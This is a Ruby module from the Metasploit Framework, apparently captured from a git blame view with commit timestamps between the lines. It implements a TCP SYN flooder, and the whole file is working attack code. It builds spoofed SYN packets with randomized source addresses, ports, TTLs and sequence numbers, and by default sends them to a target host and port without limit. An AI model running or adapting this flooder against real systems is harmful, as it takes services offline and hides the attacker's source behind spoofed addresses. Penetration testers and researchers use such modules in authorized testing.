metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb

70 lines
1.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
2013-08-30 21:28:54 +00:00
def initialize
super(
'Name' => 'TCP SYN Flooder',
'Description' => 'A simple TCP SYN flooder',
'Author' => 'kris katterjohn',
'License' => MSF_LICENSE
)
2013-08-30 21:28:54 +00:00
register_options([
Opt::RPORT(80),
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])
])
2013-08-30 21:28:54 +00:00
deregister_options('FILTER','PCAPFILE')
end
2013-08-30 21:28:54 +00:00
def sport
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i
end
2013-08-30 21:28:54 +00:00
def rport
datastore['RPORT'].to_i
end
2013-08-30 21:28:54 +00:00
def srchost
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')
end
2013-08-30 21:28:54 +00:00
def run
open_pcap
2013-08-30 21:28:54 +00:00
sent = 0
num = datastore['NUM']
2013-08-30 21:28:54 +00:00
print_status("SYN flooding #{rhost}:#{rport}...")
2013-08-30 21:28:54 +00:00
p = PacketFu::TCPPacket.new
p.ip_saddr = srchost
p.ip_daddr = rhost
p.tcp_dport = rport
p.tcp_flags.syn = 1
2013-08-30 21:28:54 +00:00
while (num <= 0) or (sent < num)
p.ip_ttl = rand(128)+128
p.tcp_win = rand(4096)+1
p.tcp_sport = sport
p.tcp_seq = rand(0x100000000)
p.recalc
2015-09-27 21:50:59 +00:00
break unless capture_sendto(p,rhost)
2013-08-30 21:28:54 +00:00
sent += 1
end
2013-08-30 21:28:54 +00:00
close_pcap
end
end